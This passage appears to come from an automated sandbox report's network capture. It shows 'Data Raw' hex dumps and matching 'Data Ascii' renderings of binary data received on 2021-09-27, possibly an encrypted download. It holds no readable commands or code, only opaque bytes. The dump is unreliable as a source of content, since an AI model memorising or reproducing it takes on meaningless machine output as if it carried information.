84 e4 cf 8f d3 25 24 f6 5a fa af 35 05 0c 41 5c ef e0 da f1 87 59 b8 7d d1 66 4b 67 02 25 ab 5d a1
                                    Data Ascii: z2%=$=mN`Ea0Wq7B=_U;Jqm|nEl!V6?ZBr_L-[ Z#5[kZap"7#%Au)e7^C2xnf>fT.OvRJ#%v$"u!SvC<?,_QfA pY<,+%$Z5A\Y}fKg%]
                                    2021-09-27 16:40:46 UTC81INData Raw: 0e b3 f2 37 15 39 f6 7b 70 ee 67 cf 2d 97 f7 73 ff f3 1f c7 b6 65 3c 53 eb f0 68 ac d4 a9 26 f1 83 12 69 70 f4 34 2e ba 47 da 38 9e 96 10 8f ff 2d 1f 91 6f 51 02 c7 88 a3 ee 81 61 22 97 85 c2 22 03 95 c0 06 4f 3e 7c 27 6e e6 cd 59 b7 32 86 b7 e1 a1 d2 e7 0a 7c 47 50 5c c1 dd c8 22 0b 92 52 60 13 bb 28 df 5a 4d 6d 22 88 31 ef dd 87 64 74 02 eb e9 18 6f 2d c8 57 78 82 a7 09 eb e2 7c 56 db c0 99 52 5b 03 f4 dc 2b c8 88 93 c9 e9 cc 49 ef 04 c0 56 8b 92 c3 88 6e 85 1f 6a 8c ab 7b 30 9a f8 22 e0 ac 70 ec c5 ea c2 d2 85 af be 13 73 12 eb 03 e9 47 a8 a0 f2 b1 4e 4a 43 37 3d af c6 ef bb fd 8f b3 e9 5c b7 7f 7b f0 7e bd 63 f0 cc 3d 7b a0 2e 43 72 34 89 67 37 c9 f9 4f 36 f0 b8 84 ae fd 1e ea 52 f7 35 b9 5c ab 2a 82 41 3e 0e 78 78 c8 0f a2 65 63 dd dc 62 ed 0c e9 94
                                    Data Ascii: 79{pg-se<Sh&ip4.G8-oQa""O>|'nY2|GP\"R`(ZMm"1dto-Wx|VR[+IVnj{0"psGNJC7=\{~c={.Cr4g7O6R5\*A>xxecb
                                    2021-09-27 16:40:46 UTC82INData Raw: 95 c1 d2 99 35 c2 66 b1 3f 77 98 fe 6e b5 d1 80 95 da d0 f8 08 4a f3 97 85 6e 55 32 f5 5c 21 e7 dd 03 73 ef 12 0a aa 88 26 28 44 26 23 bb bf b0 a1 b2 08 31 80 d2 7a 5e 0b 81 28 9b b5 2d d0 07 7e 2b cb af af f3 b2 17 88 56 01 92 b4 5a 42 f0 a8 ab bd 99 27 25 c0 d8 7c a0 30 fb 64 d6 0a c0 7f 12 44 a1 48 9c cc e5 cd 8c 75 0c bd 3f 3d 30 1e 36 01 d6 e8 08 07 3b bf 6f 75 ee f5 7b ea b8 65 3e 6d d6 f5 44 a8 d5 8d 08 f9 9a e6 7e 6f fd 16 04 55 8e f2 a9 f1 5a 1a 88 ef 2d 80 2a 1a bf 6f d4 83 8b 21 af 61 24 81 be dc 27 03 6a d6 35 44 9b 54 e1 7b f0 c6 1d 38 32 8f a4 18 b1 f2 82 3c 56 76 5a 74 0c f4 fe 3e 10 ba 75 78 ed b0 12 e9 55 50 14 f3 81 31 e0 a8 b5 65 58 0c d5 0a 07 62 2b c6 51 8a ec bf 09 f3 e5 13 bc cc 3e 92 6b 6a 1a f0 db 33 df 19 a6 e7 eb ed 24 08 bf b3
                                    Data Ascii: 5f?wnJnU2\!s&(D&#1z^(-~+VZB'%|0dDHu?=06;ou{e>mD~oUZ-*o!a$'j5DT{82<VvZt>uxUP1eXb+Q>kj3$
                                    2021-09-27 16:40:46 UTC83INData Raw: f4 64 0a 8a 33 fa e3 97 fc 63 1a 20 4a a1 e0 1e 83 40 8d e7 8e 5f f2 0c 6d 8b 73 52 cb e6 96 29 28 34 4f 5a b5 3b a4 af 27 18 35 80 4f 9a 6a 13 ad f4 7d 48 19 a9 97 2c 35 f8 fa db de 52 91 4a 88 fd 28 c2 c8 ca d1 a2 21 94 48 0f 65 12 88 eb 1d ee 0a 5a ef 7d 70 35 4b 40 a3 82 8d 70 6b 3e 5e d1 f7 9e c9 2b b0 0b 45 60 64 47 2e 2a e6 6c a0 03 73 90 54 fe 19 5a 16 19 85 92 5e ae e0 d1 52 61 71 c1 1d 3f 3b 1d f7 51 ea 93 db 10 cb a9 aa b1 54 fa 26 a0 b2 4c 89 c9 5f 6f 0d 2a ea 18 2e 9f 67 2d 8e 82 73 42 fa 1f d7 57 88 c4 bb 5e 11 61 d5 71 7d 00 e4 0a bd 10 31 c3 7b 97 59 ad 36 01 02 66 8b 90 ac 5c 97 8a 96 6a 69 21 f4 b4 3e 1c 4a 49 59 57 b4 ea 0c 78 77 cd 60 5f c6 c6 c2 a1 f4 bf 44 eb a7 6e b8 77 dd fd 1a 5e 20 69 eb eb 90 11 99 e4 db 11 33 6d a0 4f d8 55 42
                                    Data Ascii: d3c J@_msR)(4OZ;'5Oj}H,5RJ(!HeZ}p5K@pk>^+E`dG.*lsTZ^Raq?;QT&L_o*.g-sBW^aq}1{Y6f\ji!>JIYWxw`_Dnw^ i3mOUB
                                    2021-09-27 16:40:46 UTC84INData Raw: 57 43 af bd 9d 60 ae c1 d8 7c a5 5a 31 0b e2 0c c6 06 04 87 a5 42 8b df be a2 8e 75 0c 83 4e 34 39 3c dc 46 d4 ee 6d c2 2d 29 d2 1d ec f8 14 d4 c7 b7 34 45 11 ee 63 bd cc a5 37 f6 85 ab 96 5d da 28 2e 93 9b f8 b5 f1 12 1b 88 e3 59 af 24 75 81 13 eb 8b a3 ee 83 25 20 97 9c f0 5c c4 60 c0 02 3c d7 7e 27 75 d8 86 70 f4 38 a7 e9 1d a0 f4 82 8d 55 76 56 43 83 e3 f1 38 17 9d 44 51 13 bb 28 99 5c 22 f5 3b 85 35 ee d6 7d b3 d7 2d fd c3 01 4a 3f c0 40 8c 81 f0 cd f3 ef 78 59 be 00 9a 7e 53 05 fc af 63 d1 76 98 cd a9 e5 4b ce 97 f0 7d 89 98 c0 95 ff 5d 5a 7b 8d a1 73 22 63 fa 22 ee b4 35 d5 c8 ea d9 f5 21 84 40 14 77 f3 d2 8c 1e bc 07 b3 d0 a0 69 17 52 38 28 b4 84 ea 97 da a5 ec 21 5c bd 53 78 cf 7c bb 6d e1 8e d2 3a a2 24 18 72 ef 8b 67 37 f7 7d 28 cb 09 6f a8 9b
                                    Data Ascii: WC`|Z1BuN49<Fm-)4Ec7](.Y$u% \`<~'up8UvVC8DQ(\";5}-J?@xY~ScvK}]Z{s"c"5!@wiR8(!\Sx|m:$rg7}(o
                                    2021-09-27 16:40:46 UTC86INData Raw: d6 1d e4 23 0e c5 41 78 1d 02 6a 9e 8a 95 15 c7 8b 5e d7 7a a1 5c 29 e5 11 4a 71 7c 5f cb d5 cb 43 b6 12 01 59 45 f7 07 9d 63 ca 77 69 41 67 63 ee 43 6e 6f e9 e7 25 04 1d cf ce e3 88 25 0e db bf b3 bb 59 e6 30 94 5d 44 bc 67 5c 38 cf 34 67 37 26 8e 62 e8 04 b3 60 4b f8 26 97 4d 76 cf 95 2f d3 76 03 8b 70 71 da 11 ae 13 20 d7 01 c0 a5 ac 10 2a 57 77 82 9a b4 43 1e f0 29 69 45 29 f7 f3 04 05 bf 9e e5 44 b0 ff 0c e3 de 7a 0f 4d d1 ee 39 dd 27 b5 68 ed af 51 bc 74 c0 e1 03 52 03 91 c6 df 9e 16 f4 2e a0 d7 37 1e 9a 49 cf 85 ad 86 20 e9 17 f2 6f 37 05 06 cb 1a c2 aa c5 c9 04 79 b4 3b ce 17 d8 7e 23 91 b5 7a 37 0c ae de 00 e4 50 a6 34 00 4b e5 d5 1b 0e 54 7e e7 7f cd 9f 33 91 21 46 de 8f 0d 40 84 97 bf 28 5b ad 3b 1b f6 c1 0d 90 b8 37 a1 20 9a d3 cc 9d 6e d8 1d
                                    Data Ascii: #Axj^z\)Jq|_CYEcwiAgcCno%%Y0]Dg\84g7&b`K&Mv/vpq *WwC)iE)DzM9'hQtR.7I o7y;~#z7P4KT~3!F@([;7 n
                                    2021-09-27 16:40:46 UTC87INData Raw: 2f 8b 6d de 9e 75 69 81 61 22 95 be b8 25 03 6a b4 25 4f 92 67 5a b4 f0 c0 76 df 21 8d a6 37 fa fe ed 02 43 a0 dd 76 cb f0 fc 45 cd 92 5b 7c fb b2 2c 80 5e 59 36 28 94 22 e0 ff e8 60 58 06 ff c0 70 5c 2f c1 4a 98 e9 f8 4a f1 ef 76 77 8f 3c 98 74 48 12 e1 04 51 96 74 92 ef c3 a5 49 c4 b5 9b 3c 8b 92 c3 9b 06 6e 34 68 8a aa 7a 2c 8f f8 22 e0 b4 7b ac b4 ab ca fa 34 83 fe 17 5b f0 fc 2d e7 44 fb 7b eb b1 61 93 2c b6 36 87 7c 67 84 fb a7 96 fa 50 bf 50 8f e0 72 93 3d f8 e4 ab 14 22 25 12 5c bc 83 65 3a 6d 7b 4d 36 f7 81 bb a8 71 52 c2 7e f4 1d 06 5f 83 e4 a8 72 39 26 55 6f 44 3a cd 48 60 f5 e5 64 82 2c c3 ce 5a fa 6c 70 3b 8d b8 7e c4 95 a1 36 18 01 40 c4 1e 3d 2d 8b 9f f2 67 a1 8f 6e d0 5c 0b 7b 82 f0 92 5e 2b 71 98 d1 c2 01 02 93 16 9f e6 1c ea b8 df e5 a4
                                    Data Ascii: /muia"%j%OgZv!7CvE[|,^Y6("`Xp\/JJvw<tHQtI<n4hz,"{4[-D{a,6|gPPr="%\e:m{M6qR~_r9&UoD:H`d,Zlp;~6@=-gn\{^+q
                                    2021-09-27 16:40:46 UTC88INData Raw: 60 40 10 9d 66 34 9a 90 13 0a f8 0e d4 67 34 c7 97 5e 04 72 70 ca 74 02 ee 3b ec 1b 31 d8 5a c2 a5 ac 10 13 10 64 8f 1f 94 55 88 81 13 a6 45 23 db 06 69 16 b4 b6 ac e4 9b a1 07 8f 83 cd 60 5a d9 ff 35 76 7b 9f 68 e9 b2 1f 7f 7b c0 f4 1d 40 24 68 b4 cd 83 14 85 f7 a8 a4 72 6f a4 41 e7 cd d1 b9 28 f8 19 a9 6a 37 05 06 f5 18 f2 a8 cf e1 58 5d a7 3e df 03 c6 6c 92 46 b4 56 3f 66 67 c9 d6 f3 e3 d6 8f 12 44 e3 ec 58 13 68 8a 44 42 d7 f7 59 5c 30 4b 55 d5 33 42 86 e6 6b 42 28 e8 ef ac ef ed 5c 9f af eb a4 1e 58 c1 e0 9c 5f 4d f1 0d 52 d0 11 b3 0b 94 24 0d 37 5e 67 c8 df 06 0b 1f e3 12 f5 79 8d f3 e6 7c ea b6 41 b2 12 7e 2f 6e a8 a2 6a 4d 8f ba 48 d7 f3 fc a9 d5 4d f8 10 2b c1 d8 bb 7a d6 61 d4 20 36 9a f4 73 77 ad 17 87 d6 ee 64 36 48 f3 9a ea 5d 38 06 fd 74 6f
                                    Data Ascii: `@f4g4^rpt;1ZdUE#i`Z5v{h{@$hroA(j7X]>lFV?fgDXhDBY\0KU3BkB(\X_MR$7^gy|A~/njMHM+za 6swd6H]8to
                                    2021-09-27 16:40:46 UTC89INData Raw: 3c e3 b9 59 14 fd b2 fa 69 19 14 e4 eb e1 61 c4 bf b3 6c b9 90 c9 a9 69 ea 35 6e 8c a1 68 49 ba d1 39 ea ac 08 38 c6 c6 ca e2 35 ab b9 03 a5 fb c6 01 f4 48 f8 ab f8 4d 67 3b 41 1c 35 ac 99 e9 c0 30 a7 97 ed d2 0a 7d 0b f1 6d 8b 64 f8 91 a1 7b a0 2c 12 5a be 9f 6c 16 ba 3d 4a 2f 08 91 9b ab e9 3e d8 75 f5 32 a9 a1 82 c2 9a 45 3a 5d 94 78 c8 01 ce c7 4b dd d6 67 f9 f6 eb 94 5e 74 d1 2d 8f 98 92 63 43 aa a6 21 e7 13 65 c4 7d fd 2d 8c 83 05 77 8b 54 e2 f8 27 c0 79 80 f3 90 af 19 ba 80 cb ce 01 98 2b 17 b3 e5 23 54 b8 d8 f4 72 0f 5e 09 93 6e 1b 2d c8 8c ca 53 f7 e1 b1 3b b2 f1 0e 9d e2 8e b6 cf 4c c7 12 96 b2 7c 0b 05 30 2d 7e 79 a4 3c 34 7d f8 1f 61 8d 5d 97 a1 67 1a 0a 65 26 ab 26 e9 0a 1a ef 60 02 32 58 89 00 1b 9a b4 b5 75 80 49 f0 66 a4 9d 71 2d 83 51 9b
                                    Data Ascii: <Yiali5nhI985HMg;A50}md{,Zl=J/>u2E:]xKg^t-cC!e}-wT'y+#Tr^n-S;L|0-~y<4}a]ge&&`2XuIfq-Q
                                    2021-09-27 16:40:46 UTC91INData Raw: 4d 26 6e d6 f6 96 ce 98 30 2d fc 33 6d a5 63 85 8d d3 b3 56 fb 1d da 34 26 08 1d d5 72 b7 a9 c5 c3 0a 52 c8 2c cf 06 dd 0e 39 6d b4 50 2b 0e af dd c5 f1 42 a8 0c 9d f3 f2 1e 07 07 7b 8f cd 7a c2 9a 59 56 b0 50 f4 db 22 44 95 9a b7 4d b9 f3 36 7a d4 03 4c 92 b2 15 63 12 49 c6 d9 aa 61 d8 06 e1 ab d0 18 b3 0b 94 2d 0d 3e 5e 60 c7 68 ed fc f1 dd 74 d2 7b 8d f7 8c b2 c2 64 41 b1 90 80 1e 2c 52 a4 6c 5c 85 d6 2e e8 f1 f6 b2 dd 30 5d 42 38 d0 c3 82 2a 5a d6 e1 aa 8b 67 0b a7 60 e7 bb b1 d6 e8 1d 1b 5a db a8 94 62 30 d8 f7 5a 01 cf 60 46 6f e9 04 22 84 88 26 3a 52 15 28 3f 96 0e a5 17 0f 5e 4c dd 7a 54 0c 8a 24 f4 80 19 d2 73 24 95 cf a5 be cd c8 3b 88 5c 21 84 87 42 7b da 68 9d bd 9f 48 ec c0 d8 67 b1 2a dc 10 e2 0f d7 8b 3b a9 a7 50 91 da ca f5 72 74 2a a9 1b
                                    Data Ascii: M&n0-3mcV4&rR,9mP+B{zYVP"DM6zLcIa->^`ht{dA,Rl\.0]B8*Zg`Zb0Z`Fo"&:R(?^LzT$s$;\!B{hHg*;Prt*
                                    2021-09-27 16:40:46 UTC92INData Raw: b2 71 a0 35 18 45 bc 77 66 11 e8 05 86 36 f6 90 a8 bb ee 1e c2 6f ff 2a bc a1 82 c2 87 57 2b 2e 40 68 db 0f cd 59 6b ca 28 64 ae 25 f3 87 50 fa 77 15 a1 72 b9 54 40 92 d8 36 19 12 55 d5 6f f6 3c 81 84 f6 88 a6 75 e7 ec 50 14 77 93 fd 1e 09 21 6e 8d 3e cf 2a 9c c4 13 89 ee 3c 4e bd 51 58 a4 3b 73 0b b2 73 25 9d c0 f7 10 59 ee 1b b3 98 9e f2 1d 98 83 4d bc cf 59 c9 95 42 b3 50 0c 07 04 03 60 89 b7 36 34 d4 f2 03 8e 9a 62 99 88 b8 0b 0c ff 35 be 3f ed fe 1b d2 69 05 28 a2 88 3d 14 84 5b b0 d7 39 89 f9 02 62 8e 7b 29 1c ec 89 26 d5 a4 7c 29 fb 89 29 b9 ac b9 2f 6a 51 96 73 33 b2 ec 64 5e 0b 46 9f 1c c3 e8 d3 da 46 49 94 d5 bd fd 39 c9 c1 f4 14 a1 0d 94 48 03 6d cd 17 dc 02 f9 18 46 c7 50 78 2b bf 69 b2 86 a6 77 5c 83 4d db fd a3 5c 29 a9 fc 44 5d 67 41 d6 3c
                                    Data Ascii: q5Ewf6o*W+.@hYk(d%PwrT@6Uo<uPw!n>*<NQX;ss%YMYBP`64b5?i(=[9b{)&|))/jQs3d^FFI9HmFPx+iw\M\)D]gA<
                                    2021-09-27 16:40:46 UTC93INData Raw: 97 e5 1b fc ed 5c 99 22 2e ba 11 32 10 f1 8e 65 c9 07 e5 7b 5b 04 a8 df fc ff 1c 31 4b 5a b8 a8 fa e5 ec cf 33 22 7d 8d f7 8b 37 ed b6 45 b0 82 fb 20 06 f1 a2 6a 47 a5 25 3b e9 fb ed af d8 0f 35 53 29 c7 c4 1e 3f d4 61 df 1c 61 8c dc da 6f c2 99 ae 8c e8 17 02 5b fe e4 a6 62 3a 04 f5 27 f2 cf 60 03 5b 9c 04 22 82 9b 2c 09 15 04 2e a3 9b 1a 8d 64 0a 5e 4a c4 f7 53 0c 90 25 e0 95 3b f8 ae 56 94 c5 87 35 e5 9a 33 99 5a 1f ac 39 53 4b de 7e 22 ba 9f 48 e8 d4 cc 62 8f 82 f7 0b e8 20 9a 75 3a 8f b4 45 ee e8 cd e3 8e 61 2e de 0c 36 3f 25 fe 14 dc f8 49 c4 38 ae 6f 7a d7 56 15 de bc 43 22 56 12 da 4b bf c8 b2 f0 ea 91 fd 63 4d f9 21 04 6e 75 0d be 99 af 96 88 e5 2a 93 5d a9 8b 6d d0 8b d8 38 ab 61 26 19 21 e5 fd 99 73 ce 04 34 4f 7c 27 7b dc db 63 f2 35 9e aa 0e
                                    Data Ascii: \".2e{[1KZ3"}7E jG%;5S)?aao[b:'`[",.d^JS%;V53Z9SK~"Hb u:Ea.6?%I8ozVC"VKcM!nu*]m8a&!s4O|'{c5
                                    2021-09-27 16:40:46 UTC95INData Raw: 30 f0 75 99 c6 a1 6a 8c d5 1c b9 f6 3f 4e b2 cb c7 30 0c 72 0d ae e1 37 8e ca f6 15 47 e3 cd 11 b4 98 fb 26 8e 99 5e bc a0 25 c1 88 b6 94 6d 00 3e 24 2d 7e 91 cb 50 36 c5 f2 39 7e 9e 5f 98 f6 6d 1a 0a 6f 77 b4 26 b8 d8 12 c7 43 a1 20 5c 89 45 34 87 4e ab 09 da 57 da 92 69 9d 7b 05 5f f7 92 3a b1 b6 40 26 fb 9f 69 af 32 11 27 d4 20 98 60 33 a1 f2 7f 4e 0c 83 2d 30 cb f9 c7 e7 de 59 90 10 d8 f5 29 c3 d4 e6 c2 cf 23 9e 53 27 74 18 15 c4 0b ff 04 23 28 41 72 3f 10 43 8c 8e 89 3c 6f 83 5a f1 46 b3 56 36 f7 29 41 75 72 00 84 00 b4 67 a7 2a 15 fe 47 f7 09 b7 06 24 99 83 6e 34 6f e6 03 70 74 c5 83 37 3a 05 e5 5f d9 e7 4b 13 e7 a6 af aa 59 f8 3a 8e f5 54 82 26 4f 54 d0 5b 6f 32 2e 95 62 16 e4 9a 60 41 d7 1c d0 4b 30 e9 9e 50 35 cd 02 8f 76 56 cf 17 aa 06 61 86 59
                                    Data Ascii: 0uj?N0r7G&^%m>$-~P69~_mow&C \E4NWi{_:@&i2' `3N-0Y)#S't#(Ar?C<oZFV6)Aurg*G$n4opt7:_KY:T&OT[o2.b`AK0P5vVaY
                                    2021-09-27 16:40:46 UTC96INData Raw: 78 c2 93 8c d4 fe 6a e4 4a f3 94 96 74 47 eb f7 5c 2f cd 63 7a 96 e9 04 26 86 8c 5b c4 52 15 2c b0 b7 0e e5 b3 0e d3 67 d2 7a 55 71 77 24 f4 85 2d a3 7e 54 94 c5 d2 4a e5 9a 3d 8a 2d e8 84 87 55 49 b7 27 ae bd 95 4a 9a b3 da 76 ad 5c 13 0b e2 0c c2 0e de 85 a5 4c 98 b5 82 e2 8c 7f 04 d0 ef 36 39 32 f6 7e 31 ee 67 cf 2d bd 1e 95 ff f9 10 50 0d 0a 40 47 15 fb 46 d5 27 a5 26 fd 98 97 8f 5c f6 1b 3a 93 f1 15 af 9e 92 94 3f 8a 5e 93 26 7f 89 16 37 89 a3 e0 bf 9f 24 20 97 f2 21 70 15 c2 06 45 fd 0a 25 7f fa c2 09 10 32 8f aa 0b 5e f8 5a 09 54 70 23 29 c9 f0 f4 57 70 90 5b 72 ef ad 79 32 5e 59 38 11 85 31 f5 f7 7a 65 85 07 fd c3 c9 62 2d d0 56 95 85 b3 c4 f2 ef 7c 5f dc 38 87 6e a7 15 d5 cc 20 da 02 ea e5 eb e6 36 22 bf b3 7b 96 83 da 85 69 fb 33 75 72 a0 55 55
                                    Data Ascii: xjJtG\/cz&[R,gzUqw$-~TJ=-UI'Jv\L692~1g-P@GF'&\:?^&7$ !pE%2^ZTp#)Wp[ry2^Y81zeb-V|_8n 6"{i3urUU
                                    2021-09-27 16:40:46 UTC97INData Raw: fd 86 1f 83 4b a7 5d 9c 5b da 50 69 9d 7b 38 09 ec ba 2a 2d d1 c7 25 ea 8e 12 bd 0a 70 1f bb 44 8c fa 32 6c f3 4b 69 2e b8 9e 3a c6 d1 ee f7 cf 5c 59 c6 b0 d7 28 c2 ce e2 ea a0 21 be 59 00 51 1b 0a 41 1d ee 0a a6 c5 69 65 35 41 62 9c 96 f0 70 42 8a 5a d3 eb cf 5d 37 a3 06 47 02 12 52 d0 21 b7 63 b9 10 7e 92 3b 64 03 a4 1d 48 87 97 5d 70 6e fa 2f 71 71 d2 1d 26 3e 7e 8a 51 e2 88 21 3b dd ae ab d4 f5 e8 2f a6 a1 6d 10 35 5e 49 2c 1e 64 1f 28 9d 09 f6 8a 98 66 61 fa 0e de 5c 46 c6 97 32 15 76 03 41 76 02 f5 07 2e 0d 30 d2 76 a1 12 ad 1a 02 3d f4 80 90 b7 d5 9d 82 68 6f 65 23 de b1 06 88 ce b6 a6 47 30 e1 04 f4 4c db 1e 4a d1 ee 37 2e 43 a2 b2 e4 bb 4f 80 7c 78 fa 1a 41 20 78 98 e5 b7 18 af c6 23 6f de 6b b3 2f ae 85 f8 bd 24 fe 79 d0 27 22 d3 00 d5 47 c1 4a
                                    Data Ascii: K][Pi{8*-%pD2lKi.:\Y(!YQAie5AbpBZ]7GR!c~;dH]pn/qq&>~Q!;/m5^I,d(fa\F2vAv.0v=hoe#G0LJ7.CO|xA x#ok/$y'"GJ
                                    2021-09-27 16:40:46 UTC98INData Raw: 88 a0 86 49 86 a6 35 0e 21 51 df 76 f2 2d 9a 9f e2 88 a6 75 e4 ed 56 11 6a 84 f7 0f 1c 30 8f 98 ec cb 1f 84 c9 05 9b e7 25 5b a4 21 ee a0 02 70 12 be 1f 69 8e ca fd 0d 4e e4 e1 b2 a5 9c ef f0 9e b5 55 bf cd 35 ce 89 bc b6 63 02 05 04 2e 6f 93 b9 c2 35 e9 f4 17 73 8d 66 50 98 bf 1c 07 7b 35 be 22 ef f0 0c 3d 62 36 22 44 9a 15 1f 92 4e ae a7 8f 73 f7 36 d0 86 62 2d 0d f7 92 3b d5 a4 7c 26 fd 9c 3c be 33 0a 02 b2 b0 9b 4c 3b 99 f8 56 28 e6 47 61 39 e1 f9 d6 f7 dc 66 85 c6 fc fd 28 c3 0c e2 ea b1 23 f1 db 09 7a 11 29 db 1e f9 25 47 ef 6f 70 35 47 1b 1d 82 8d 70 39 f9 e5 d0 fd b4 5d 31 a1 7f 4b 70 6d 54 d7 28 b7 7d b9 10 7e 97 41 8a 10 a5 17 31 8f f9 86 75 6c e8 7e 63 77 f8 1d 09 2e 13 98 88 e2 88 23 62 63 ae bc b1 32 e9 3c 90 a5 45 a7 37 5e 43 d5 34 67 22 2c
                                    Data Ascii: I5!Qv-uVj0%[!piNU5c.o5sfP{5"=b6"DNs6b-;|&<3L;V(Ga9f(#z)%Gop5Gp9]1KpmT(}~A1ul~cw.#bc2<E7^C4g",
                                    2021-09-27 16:40:46 UTC99INData Raw: ad 5d 75 43 9e bc 3b f8 f4 e2 5d cd 0b 8d 7a c3 de db 80 3d d4 70 db 11 8b 99 d8 69 6d b9 9d 87 d6 ec 78 8e 48 f3 9a 2c 68 20 15 f2 5c 3a ca 76 f9 72 c5 07 35 97 8d 26 33 57 0a 3f 4c 96 22 a7 99 0b 66 af 2f 85 ab 26 90 24 e7 b1 2a d0 08 54 94 cf 77 a9 e5 8b 3b f3 46 0a 84 83 7c 40 f0 a9 ab bd 99 3b 6a c2 d8 7c dd 52 88 09 e2 02 cc 63 30 bd 70 49 9a da cf 98 9c 74 06 af 0a 1e 2d 37 f4 0f c5 fe 76 db 55 9f 35 39 fe fb 7e 9e 7d 64 34 45 17 8a 54 af c3 a1 20 e7 4c c4 e3 5e f6 15 0c 91 82 f2 af c1 80 e4 89 f3 d4 90 35 72 89 16 c4 88 a3 e0 ad 7e 28 41 be 79 25 03 6a d3 0b 4d e9 6c 26 7f f4 c6 6d f8 e4 a7 ba 1e a0 f4 fe 06 56 0d 40 5d cb f4 f8 27 16 44 73 6c ec ba 0e c9 5b 5b 47 2b 84 31 e2 c1 66 71 8e 2e e9 c2 03 68 43 d2 44 84 f8 9b 0a f3 eb 7a 40 d5 e8 b0 6a
                                    Data Ascii: ]uC;]z=pimxH,h \:vr5&3W?L"f/&$*Tw;F|@;j|Rc0pIt-7vU59~}d4ET L^5r~(Ay%jMl&mV@]'Dsl[[G+1fq.hCDz@j
                                    2021-09-27 16:40:46 UTC100INData Raw: 74 84 a1 3f 25 c0 97 89 72 9b 44 be b3 bd 4a 1b 60 2e d5 e8 ff f4 1d ef 7d 0b 25 4d 8c 6a 06 82 4a b0 51 9f 5a 89 07 69 9d 75 38 08 9d b2 2c 2b a1 3f e1 eb 8f 3e 98 30 08 35 2c 4c 9a 6a 14 08 23 60 53 1f 46 88 17 cb f9 cd 98 98 56 87 cc 6b ff 78 ac 16 e3 ea a6 30 9a 36 c3 7b 1b 02 d6 4d 95 06 4d c7 45 5a 0c 41 68 94 89 8f 2a 38 87 5f d1 f9 9a ce 34 a3 08 47 73 3d 2b dd 2a ca 6b ba 40 01 82 44 f7 07 8c d5 34 88 90 0c aa 47 c6 65 61 70 d8 0f 2f 00 2c f7 40 e9 56 3a 18 cf 9d bc bb 42 c5 29 a9 8b 7c 90 37 54 4b 2e 05 67 33 24 b3 60 36 a3 a1 60 4b f0 d2 c9 65 71 ef 97 55 3d 76 03 8d 76 38 e4 41 22 19 3f d2 72 81 a7 ac 1a 2f 15 de 5a 90 b3 4f 88 83 69 69 45 0e df 08 e0 05 a8 b6 a6 46 b0 e6 35 f0 48 0b 60 5e d0 33 33 a0 e5 a3 7b ed 88 ce af 7b c0 f0 1d 49 3a 91
                                    Data Ascii: t?%rDJ`.}%MjJQZiu8,+?>05,Lj#`SFVkx06{MMEZAh*8_4Gs=+*k@D4Geap/,@V:B)|7TK.g3$`6`KeqU=vv8A"?r/ZOiiEF5H`^33{{I:
                                    2021-09-27 16:40:46 UTC102INData Raw: 45 92 cf be af f2 64 38 a4 55 13 97 81 51 5a de 74 51 bc b3 58 e1 c3 a3 6c a6 21 f3 64 7a 08 c0 7f 31 98 b6 4e 9a cb cb f9 72 74 2a ae 27 d0 22 25 f2 05 c7 e8 78 d5 c5 be 49 66 fd 82 1a df ba 61 32 53 13 7f f3 c1 6a a5 26 f3 85 f3 7b 5a f6 0e 2a 8e 91 0c ae b2 b4 18 f3 eb 2b 91 22 77 88 16 c9 88 a3 e0 c4 b3 23 97 90 da bd 01 60 ca 10 55 fd d5 27 7f fa df 6e e7 34 8f bf 19 bf f7 13 09 78 3e 52 27 c5 f1 fe 3c 18 1f 70 78 ed bb 17 df 4f 5c 2a 24 d5 ad f7 c2 6e 7a 13 9a ec c6 1b 75 b1 d0 45 9f 9b 17 1a f6 f5 63 48 51 2f 9d 65 46 1f 65 cd 27 cf 69 86 79 fa e2 56 d2 23 a2 7a 9f 8c a6 2a 69 ea 3f 77 86 b2 7f 5f a0 fc 3d f3 55 1e ea d0 e8 b3 f4 3f ab ba 03 73 63 e8 03 e9 55 e0 c3 49 b3 66 1d 5c 2d 24 81 7a fa bd e4 b7 69 e8 70 9f 55 70 ff 7f bb 63 fa e7 da 5a a1
                                    Data Ascii: Ed8UQZtQXl!dz1Nrt*'"%xIfa2Sj&{Z*+"w#`U'n4x>R'<pxO\*$nzuEcHQ/eFe'iyV#z*i?w_=U?scUIf\-$zipUpcZ
                                    2021-09-27 16:40:46 UTC103INData Raw: a8 f2 d6 c2 f2 f5 e8 db 2f 9f 59 0f 6c 33 9e d6 1d e4 1d 56 a8 e8 72 35 4b 77 8e 93 89 7a 52 8e 41 c3 03 b3 7a 39 a1 79 4f 70 6d 54 e9 64 35 90 47 0f 69 83 41 f7 12 a0 08 21 76 97 71 7d 54 a8 ac 9e 8f cd 0c 37 2c 14 e6 44 fe 76 24 3d f0 ae c7 b5 49 e9 2b bf 8e 6d 09 35 5e 49 10 2c 08 9a 2e 9f 6c 20 98 9c 60 5a fe 12 20 4e 5a d2 95 2f 1b 77 03 8b 69 2f cc 8a ac 19 3b c4 6a ee 0e ac 1a 08 08 66 86 90 ac 51 9f 7d 69 47 46 3b cc b5 06 14 b1 a9 b5 b8 b1 d9 0f dc df cd 60 54 dc f1 27 b3 f0 b5 79 ed af 7c 51 7a ec 8e 0e 36 28 6e c7 f7 9e 18 02 cd a0 d7 32 60 ad 5d ef 70 d3 b9 22 75 14 cd 0f ca 05 0c dd c6 f9 b0 e5 36 1b 5f a7 a8 c7 1f f7 9e 1d 6f b4 ca 34 07 8a 36 d6 f7 54 25 02 08 64 1a c4 14 11 f4 89 fa 73 2c 9d 48 59 bd 4f c7 dc cc 42 84 9d 3a 4b 36 cc c6 1b
                                    Data Ascii: /Yl3Vr5KwzRAz9yOpmTd5GiA!vq}T7,Dv$=I+m5^I,.l `Z NZ/wi/;jfQ}iGF;`T'y|Qz6(n2`]p"u6_o46T%ds,HYOB:K6
